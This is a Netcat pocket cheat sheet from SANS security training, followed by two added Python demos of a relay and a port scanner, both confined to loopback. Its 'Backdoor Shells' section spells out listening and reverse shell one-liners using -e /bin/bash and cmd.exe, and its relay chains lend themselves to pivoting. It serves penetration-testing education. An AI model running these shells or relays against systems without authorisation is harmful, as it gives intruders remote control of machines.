Netcat Cheat Sheet
By Ed Skoudis
POCKET REFERENCE GUIDE
http://www.sans.org

Purpose

This cheat sheet provides various tips for using Netcat on Linux/Unix and Windows, specifically tailored to the SANS 504, 517, and 560 courses. All syntax is designed for the original Netcat versions, released by Hobbit and Weld Pond. The syntax here can be adapted for other Netcats, including ncat, GNU Netcat, and others; where a flag is specific to one build (-L on Windows, -e on builds that include it) that is noted below.

Fundamentals

Fundamental Netcat Client:
$ nc [TargetIPaddr] [port]

Connect to an arbitrary port [port] at IP address [TargetIPaddr].

Fundamental Netcat Listener:
$ nc -l -p [LocalPort]

Create a Netcat listener on arbitrary local port [LocalPort].

Both the client and listener take input from STDIN and send data received from the network to STDOUT.

Netcat Command Flags

$ nc [options] [TargetIPaddr] [port(s)]

The [TargetIPaddr] is simply the other side's IP address or domain name. It is required in client mode, of course (because we have to tell the client where to connect), and is optional in listen mode.

-l: Listen mode (default is client mode)
-L: Listen harder (supported only on the Windows version of Netcat). This option makes Netcat a persistent listener which starts listening again after a client disconnects
-u: UDP mode (default is TCP)
-p: Local port (in listen mode, this is the port listened on; in client mode, this is the source port for all packets sent)
-e: Program to execute after a connection occurs, connecting STDIN and STDOUT to the program
-n: Don't perform DNS lookups on names of machines on the other side
-z: Zero-I/O mode (don't send any data, just complete the connection without sending a payload)
-wN: Timeout for connects and final network reads. A Netcat client or listener with this option will wait N seconds to make a connection; if the connection doesn't happen in that time, Netcat stops running. It also waits N seconds for more network data after STDIN is closed before exiting, which is why the file transfer commands below use -w3
-v: Be verbose, printing out messages on Standard Error, such as when a connection occurs
-vv: Be very verbose, printing even more details on Standard Error

File Transfer

Push a file from client to listener:
$ nc -l -p [LocalPort] > [outfile]

Listen on [LocalPort], store results in [outfile].

$ nc -w3 [TargetIPaddr] [port] < [infile]

Push [infile] to [TargetIPaddr] on [port]. When STDIN hits end of file, -w3 lets the client wait three seconds and then exit, closing the connection so the listener also exits.

Pull file from listener back to client:
$ nc -l -p [LocalPort] < [infile]

Listen on [LocalPort], prep to push [infile].

$ nc -w3 [TargetIPaddr] [port] > [outfile]

Connect to [TargetIPaddr] on [port] and retrieve [outfile].

Netcat performs no integrity check on either transfer; compare a hash of [infile] and [outfile] (for example with md5sum or sha256sum) on both ends before trusting the copy.

TCP Port Scanner

Port scan an IP address:
$ nc -v -n -z -w1 [TargetIPaddr] [start_port]-[end_port]

Attempt to connect to each port in a range from [end_port] down to [start_port] (the original Netcat walks a range from the highest port to the lowest) on IP address [TargetIPaddr], running verbosely (-v on Linux, -vv on Windows), not resolving names (-n), without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1).

The randomize ports (-r) switch can be used to choose port numbers randomly in the range.

TCP Banner Grabber

Grab the banner of any TCP service running on an IP address from Linux:
$ echo "" | nc -v -n -w1 [TargetIPaddr] [start_port]-[end_port]

Attempt to connect to each port in a range from [end_port] down to [start_port] on IP address [TargetIPaddr], running verbosely (-v), not resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a blank line (the newline that echo "" writes to STDIN) to each open port and print out any banner received in response. Services that wait for the client to speak first (HTTP, for example) will show nothing beyond the verbose "open" message.

Add -r to randomize destination ports within the range.

Add -p [port] to specify a source port for the scan.

Backdoor Shells

Listening backdoor shell on Linux:
$ nc -l -p [LocalPort] -e /bin/bash

Listening backdoor shell on Windows:
C:\> nc -l -p [LocalPort] -e cmd.exe

Create a shell on local port [LocalPort] that can then be accessed using a fundamental Netcat client.

Reverse backdoor shell on Linux:
$ nc [YourIPaddr] [port] -e /bin/bash

Reverse backdoor shell on Windows:
C:\> nc [YourIPaddr] [port] -e cmd.exe

Create a reverse shell that will attempt to connect to [YourIPaddr] on port [port]. This shell can then be captured using a fundamental nc listener.

The -e option only exists in the original Netcat when it was compiled with GAPING_SECURITY_HOLE defined, and in ncat (-e or --exec); the OpenBSD Netcat that many Linux distributions install as nc does not have it.

Netcat Relays on Linux

To start, create a FIFO (named pipe) called backpipe (mkfifo backpipe is equivalent to the mknod form):
$ cd /tmp
$ mknod backpipe p

Listener-to-Client Relay:
$ nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee backpipe

Create a relay that sends packets from the local port [LocalPort] to a Netcat client connected to [TargetIPaddr] on port [port].

Listener-to-Listener Relay:
$ nc -l -p [LocalPort_1] 0<backpipe | nc -l -p [LocalPort_2] | tee backpipe

Create a relay that sends packets from any connection on [LocalPort_1] to any connection on [LocalPort_2].

Client-to-Client Relay:
$ nc [PreviousHopIPaddr] [port] 0<backpipe | nc [NextHopIPaddr] [port2] | tee backpipe

Create a relay that sends packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat client connected to [NextHopIPaddr] on port [port2].

In each chain the shell pipe carries data from the first nc to the second, and tee copies the second nc's output into backpipe, which the first nc reads as its STDIN (0<backpipe), so traffic flows in both directions. Each chain serves a single connection and exits when it closes; rerun it (or wrap it in a shell loop) to keep the relay available.

Netcat Relays on Windows

To start, enter a temporary directory where we will create .bat files:
C:\> cd c:\temp

Listener-to-Client Relay:
C:\> echo nc [TargetIPaddr] [port] > relay.bat
C:\> nc -l -p [LocalPort] -e relay.bat

Create a relay that sends packets from the local port [LocalPort] to a Netcat client connected to [TargetIPaddr] on port [port].

Listener-to-Listener Relay:
C:\> echo nc -l -p [LocalPort_2] > relay.bat
C:\> nc -l -p [LocalPort_1] -e relay.bat

Create a relay that will send packets from any connection on [LocalPort_1] to any connection on [LocalPort_2].

Client-to-Client Relay:
C:\> echo nc [NextHopIPaddr] [port2] > relay.bat
C:\> nc [PreviousHopIPaddr] [port] -e relay.bat

Create a relay that will send packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat client connected to [NextHopIPaddr] on port [port2].

Here the first nc accepts or makes the first connection and, through -e, runs relay.bat; the second nc started by that batch file inherits the first connection as its STDIN and STDOUT, so the two connections are spliced together without a FIFO. Use -L instead of -l on the listening side if the relay should survive a disconnect.
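The relay chains above splice two connections together with a pipe in one direction and a FIFO (Linux) or an inherited STDIN/STDOUT (Windows) in the other. The following is an added example, not code from the cheat sheet, that reproduces a listener-to-client relay with Python sockets so the two-directional copy is explicit: one thread moves bytes from the inbound connection to the target, a second moves the target's replies back, and each direction is shut down independently when its source closes, exactly what the nc chain needs backpipe for. Everything is confined to loopback: the listener, the relay and the constructed target service (which uppercases whatever it receives) all use OS-assigned ports, and the payload is made up for the demo.

```python
"""Listener-to-client relay over loopback (added example, not part of the
Netcat cheat sheet). Plays the role of
  nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee backpipe
with explicit threads instead of a pipe plus FIFO. Hosts, ports and the
target service are assumptions for the demo."""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src closes, then half-close dst so the
    far side sees end of file for this direction only."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def serve_relay_once(listen_sock: socket.socket, target: tuple) -> None:
    """Accept one client on listen_sock and splice it to target. Like the
    nc chain, this serves a single connection and then returns."""
    inbound, _ = listen_sock.accept()
    outbound = socket.create_connection(target, timeout=3)
    # Forward direction is the shell pipe; return direction is the FIFO.
    forward = threading.Thread(target=_pump, args=(inbound, outbound))
    back = threading.Thread(target=_pump, args=(outbound, inbound))
    forward.start()
    back.start()
    forward.join()
    back.join()
    inbound.close()
    outbound.close()


def start_listener() -> socket.socket:
    """Bind a loopback listener on an OS-assigned port."""
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", 0))
    s.listen(1)
    return s


def start_upper_echo_service() -> tuple:
    """Constructed stand-in for [TargetIPaddr]:[port]: uppercases its input."""
    srv = start_listener()

    def handle():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data.upper())
        srv.close()

    threading.Thread(target=handle, daemon=True).start()
    return srv.getsockname()


def relay_round_trip(payload: bytes) -> bytes:
    """Send payload client -> relay -> target and return what comes back."""
    target = start_upper_echo_service()
    relay = start_listener()
    worker = threading.Thread(target=serve_relay_once, args=(relay, target), daemon=True)
    worker.start()
    with socket.create_connection(relay.getsockname(), timeout=3) as client:
        client.sendall(payload)
        client.shutdown(socket.SHUT_WR)  # like STDIN closing on the nc client
        reply = b""
        while True:
            chunk = client.recv(4096)
            if not chunk:
                break
            reply += chunk
    worker.join(timeout=3)
    relay.close()
    return reply


if __name__ == "__main__":
    print(relay_round_trip(b"hello through the relay\n"))
```

The half-close in _pump is the detail that matters: if the relay closed the whole socket when one direction ended, replies still in flight from the target would be lost, which is the same reason the shell version needs tee rather than a second plain pipe.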
				
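The TCP Port Scanner and TCP Banner Grabber sections rely on three behaviours of the original Netcat that the one-liners do not spell out: the range is walked from the high port down (or shuffled with -r), -z completes the handshake and sends nothing, and the banner grab sends a bare newline and then reads until the -w timeout or the peer closes. The following added example, not part of the cheat sheet, implements those behaviours in Python sockets and exercises them against two constructed loopback services (one that announces itself, one that stays silent until the client gives up). The service names, banner text and port choices are assumptions for the demo.

```python
"""Connect scanner and banner grabber over loopback (added example, not
part of the Netcat cheat sheet). Mirrors
  nc -v -n -z -w1 host [start_port]-[end_port]      (scan)
  echo "" | nc -v -n -w1 host port                  (banner grab)
Services, ports and banner text below are constructed for the demo."""
import random
import socket
import threading


def port_order(start_port: int, end_port: int, randomize: bool = False) -> list:
    """Original Netcat walks a range from the highest port down; -r shuffles."""
    ports = list(range(end_port, start_port - 1, -1))
    if randomize:
        random.shuffle(ports)
    return ports


def scan_ports(host: str, start_port: int, end_port: int,
               timeout: float = 1.0, randomize: bool = False) -> list:
    """Return the ports that accepted a TCP connection, in the order tried."""
    open_ports = []
    for port in port_order(start_port, end_port, randomize):
        try:
            # -z: finish the handshake, send nothing, close.
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append(port)
        except OSError:
            continue  # refused, filtered, or the -w timeout expired
    return open_ports


def grab_banner(host: str, port: int, timeout: float = 1.0) -> bytes:
    """Connect, send the newline that `echo "" |` puts on STDIN, and return
    whatever arrives before the peer closes or the timeout fires."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"\n")
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # silent service: report what we have, possibly nothing
    return b"".join(chunks)


def _serve_conn(conn: socket.socket, banner: bytes) -> None:
    with conn:
        try:
            if banner:
                conn.sendall(banner)  # talkative service: speak, then close
            else:
                while conn.recv(4096):  # silent service: wait for the client
                    pass
        except OSError:
            pass


def start_service(banner: bytes = b"") -> int:
    """Constructed loopback service on an OS-assigned port; returns the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def run():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_serve_conn, args=(conn, banner), daemon=True).start()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


def demo() -> dict:
    """Scan a small range around two constructed services, then grab banners."""
    talkative = start_service(b"220 demo.example SMTP ready\r\n")
    silent = start_service()
    lo, hi = min(talkative, silent) - 2, max(talkative, silent) + 2
    return {
        "services": sorted([talkative, silent]),
        "open": scan_ports("127.0.0.1", lo, hi, timeout=0.5),
        "banner": grab_banner("127.0.0.1", talkative, timeout=0.5),
        "silent_banner": grab_banner("127.0.0.1", silent, timeout=0.5),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Because the scan range straddles ephemeral ports, other processes on the machine may show up as open as well; the two constructed services are always among the results. The silent service demonstrates the -w1 path: the grab returns empty after the timeout rather than hanging, which is what distinguishes a banner grab from a plain nc connect.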
Posted: 10/27/2009 (2 pages)